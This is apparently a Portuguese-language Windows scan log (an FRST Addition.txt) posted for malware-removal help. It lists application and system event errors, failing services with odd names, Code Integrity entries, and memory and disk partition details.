Error: (03/07/2016 12:17:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Nome do módulo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000003f81
ID do processo com falha: 0xeb8
Hora de início do aplicativo com falha: 0xspbia.exe0
Caminho do aplicativo com falha: spbia.exe1
Caminho do módulo com falha: spbia.exe2
ID do Relatório: spbia.exe3
Nome completo do pacote com falha: spbia.exe4
ID do aplicativo relativo ao pacote com falha: spbia.exe5

Error: (03/07/2016 06:13:08 AM) (Source: ESENT) (EventID: 104) (User: )
Description: SearchIndexer (3796) Windows: O mecanismo de banco de dados interrompeu a instância (0) com erro o (-510).



Sequência Interna de Intervalos: [1] 0.000, [2] 0.000, [3] 0.032, [4] 0.000, [5] 0.968, [6] 0.016, [7] 0.000, [8] 0.000, [9] 0.047, [10] 0.000, [11] 0.000, [12] 0.000, [13] 0.000, [14] 0.000, [15] 0.000.

Error: (03/07/2016 06:13:06 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: O serviço Pesquisa do Windows está sendo interrompido devido a um problema no indexador:The catalog is corrupt.

Detalhes:
O catálogo do índice de conteúdo está corrompido. 0xc0041801 (0xc0041801)


Erros de Sistema:
=============
Error: (03/07/2016 04:41:18 PM) (Source: Schannel) (EventID: 4120) (User: AUTORIDADE NT)
Description: Um alerta fatal foi gerado e enviado ao ponto de extremidade remoto. Isso pode resultar no término da conexão. O código de erro fatal definido do protocolo TLS é 10. O estado de erro do Windows SChannel é 10.

Error: (03/07/2016 03:57:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Update Primary Color devido ao seguinte erro:
%%1053

Error: (03/07/2016 03:57:56 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço Update Primary Color.

Error: (03/07/2016 03:57:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Util Primary Color devido ao seguinte erro:
%%2

Error: (03/07/2016 03:57:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Update Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (03/07/2016 03:57:50 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Util Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (03/07/2016 03:42:00 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: O desligamento do sistema que ocorreu às 13:08:05 do dia ‎07/‎03/‎2016 não era esperado.

Error: (03/07/2016 01:15:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço qEHckHCOjvx foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.

Error: (03/07/2016 01:06:35 PM) (Source: DCOM) (EventID: 10010) (User: FELIPE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (03/07/2016 01:06:35 PM) (Source: DCOM) (EventID: 10010) (User: FELIPE)
Description: {9AA46009-3CE0-458A-A354-715610A075E6}


CodeIntegrity:
===================================
Date: 2016-03-07 15:55:52.555
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 15:55:49.289
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 15:55:45.977
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:29:04.182
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:57.577
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:53.660
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:49.889
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:37.886
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:27.301
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:27:47.311
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Informações da Memória ===========================

Processador: Intel(R) Atom(TM) CPU N550 @ 1.50GHz
Percentagem de memória em uso: 84%
RAM física total: 2038.11 MB
RAM física disponível: 319.64 MB
Virtual Total: 2742.11 MB
Virtual disponível: 629.43 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:115 GB) (Free:60.21 GB) NTFS ==>[drive com componentes de inicialização (obtido através de BCD)]
Drive e: () (Fixed) (Total:350.74 GB) (Free:48.1 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 40DDCAEF)
Partition 1: (Active) - (Size=115 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=350.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16 MB) - (Type=EF)

==================== Fim de Addition.txt ============================

Publicité


Signaler le contenu de ce document

Publicité